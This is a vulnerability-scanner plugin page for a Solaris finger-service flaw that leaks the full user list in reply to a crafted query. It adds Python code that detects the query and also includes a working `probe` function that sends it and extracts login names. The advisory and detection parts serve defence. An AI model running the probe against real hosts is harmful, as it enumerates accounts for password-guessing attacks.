Solaris in.fingerd Crafted Request Information Disclosure

Medium Nessus Network Monitor Plugin ID 1280

Synopsis

The remote host may give an attacker information useful for future attacks.

Description

The remote finger server discloses the full list of its users when it receives the crafted query "a b c d e f g h" (several whitespace-separated user tokens in one request, which is outside the single-user query form of RFC 1288). An attacker can use the disclosed account names to attempt logins against each one, hoping to find a null or trivial password.
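The query and reply described above, as an added example that is not part of the plugin or of Tenable's code: it builds the crafted request, flags such a request in captured finger traffic (the passive view a network monitor has of this exchange), and extracts login names from a Solaris-style finger reply. The sample reply, the host names and the `probe` helper are constructed for illustration; the two-or-more-token rule for "crafted" is an assumption derived from the RFC 1288 query grammar, not from the plugin's own signature.

```python
"""Crafted finger query (CVE-2001-1503) helpers: build, detect, parse.

Added example, not code from the Nessus Network Monitor plugin. The sample
reply below is constructed, not captured from a real Solaris host.
"""
import re
import socket

FINGER_PORT = 79
CRAFTED_QUERY = "a b c d e f g h"   # the query named in the plugin description


def build_query(query: str = CRAFTED_QUERY) -> bytes:
    """Wire form of a finger request: the query text terminated by CRLF."""
    return (query + "\r\n").encode("ascii")


def is_crafted_request(line: bytes) -> bool:
    """Flag a finger request carrying two or more bare user tokens.

    RFC 1288 allows at most one user token (optionally prefixed by "/W");
    forwarding forms such as user@host are still a single token. Assumption:
    anything with two or more tokens is treated as the crafted query.
    """
    text = line.decode("ascii", errors="replace").rstrip("\r\n")
    tokens = text.split()
    if tokens and tokens[0] == "/W":
        tokens = tokens[1:]
    return len(tokens) >= 2


# Solaris finger output starts with a "Login  Name  TTY ..." header line and
# lists one row per user; the login name is always the first column.
_HEADER = re.compile(r"^Login\s+Name\s+TTY", re.I)


def parse_user_list(reply: bytes) -> list[str]:
    """Return the login names from a finger reply, in order, without duplicates."""
    logins = []
    seen_header = False
    for raw in reply.decode("ascii", errors="replace").splitlines():
        if not raw.strip():
            continue
        if _HEADER.match(raw):
            seen_header = True
            continue
        if seen_header:
            logins.append(raw.split()[0])
    # a user logged in on two ttys appears twice; keep first occurrence only
    return list(dict.fromkeys(logins))


# Constructed sample of what a vulnerable host returns (not real data).
SAMPLE_REPLY = (
    b"Login       Name               TTY         Idle    When    Where\r\n"
    b"root     Super-User            console      <Oct 25 09:12>\r\n"
    b"oracle   Oracle Software       pts/1       1:05 Wed 08:30  10.0.0.7\r\n"
    b"jsmith   John Smith            pts/2        Wed 08:44  10.0.0.12\r\n"
    b"jsmith   John Smith            pts/3        Wed 09:01  10.0.0.12\r\n"
)


def probe(host: str, timeout: float = 5.0) -> list[str]:
    """Active check (hypothetical helper, not run here): send the crafted
    query to a host you are authorised to test and parse what comes back."""
    with socket.create_connection((host, FINGER_PORT), timeout=timeout) as s:
        s.sendall(build_query())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_user_list(b"".join(chunks))


if __name__ == "__main__":
    print(is_crafted_request(build_query()))   # the crafted request is flagged
    print(is_crafted_request(b"jsmith\r\n"))   # an ordinary single-user query is not
    print(parse_user_list(SAMPLE_REPLY))       # logins an attacker would harvest
```

`is_crafted_request` is the part a passive monitor would run on each client line of a TCP/79 stream; `parse_user_list` is what turns the server side of that same stream into the account list the description warns about.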

Solution

Disable the finger service (in.fingerd, typically started from inetd). If it must remain enabled, restrict access to TCP port 79 to trusted hosts.

See Also

http://archives.neohapsis.com/archives/vulnwatch/2001-q4/0016.html

Plugin Details

Severity: Medium

ID: 1280

File Name: 1280.prm

Family: Finger

Published: 2004/08/20

Modified: 2016/01/21

Nessus ID: 10788

Risk Information

Risk Factor: Medium

CVSSv2

Base Score: 5

Temporal Score: 4.4

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

Temporal Vector: CVSS2#E:H/RL:OF/RC:C

CVSSv3

Base Score: 5.3

Temporal Score: 5.1

Vector: CVSS3#AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Temporal Vector: CVSS3#E:H/RL:O/RC:C

Reference Information

CVE: CVE-2001-1503

BID: 3457